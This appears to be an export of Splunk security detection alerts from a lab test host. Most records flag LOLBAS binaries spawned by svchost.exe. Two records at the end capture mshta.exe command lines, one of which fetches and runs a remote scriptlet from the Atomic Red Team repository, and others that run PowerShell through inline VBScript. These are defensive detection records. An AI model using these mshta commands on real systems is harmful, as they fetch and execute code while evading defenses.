1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="7388", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="unknown", parent_process_id="948", process="unknown", process_id="668", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="unknown", parent_process_id="736", process="unknown", process_id="668", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="668", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="unknown", parent_process_id="948", process="unknown", process_id="6064", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="unknown", parent_process_id="736", process="unknown", process_id="6064", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="6064", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="unknown", parent_process_id="948", process="unknown", process_id="528", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="unknown", parent_process_id="736", process="unknown", process_id="528", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:16", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:16", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="528", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", parent_process="unknown", parent_process_id="948", process="unknown", process_id="4716", process_name="hh.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:17:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:17:30", parent_process="unknown", parent_process_id="736", process="unknown", process_id="7296", process_name="atbroker.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:11:55", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:11:55", parent_process="unknown", parent_process_id="736", process="unknown", process_id="3904", process_name="atbroker.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:43", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:43", parent_process="C:\\Windows\\system32\\svchost.exe -k DcomLaunch", parent_process_id="736", process="C:\\Windows\\System32\\mshta.exe -Embedding", process_id="4620", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="Administrator"
1657741380, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:43", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:43", parent_process="C:\\Windows\\System32\\svchost.exe", parent_process_id="0x2e0", process="C:\\Windows\\System32\\mshta.exe -Embedding", process_id="0x120c", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_name="cmd.exe", process="C:\\Windows\\System32\\mshta.exe \"about:<hta:application><script language=\"VBScript\">Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))</script>'\"", process="C:\\Windows\\System32\\mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process="C:\\Windows\\System32\\mshta.exe vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_name="cmd.exe", process="C:\\Windows\\System32\\mshta.exe \"about:<hta:application><script language=\"VBScript\">Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))</script>'\"", process="C:\\Windows\\System32\\mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process="C:\\Windows\\System32\\mshta.exe vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="Administrator", risk_object_type="user", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
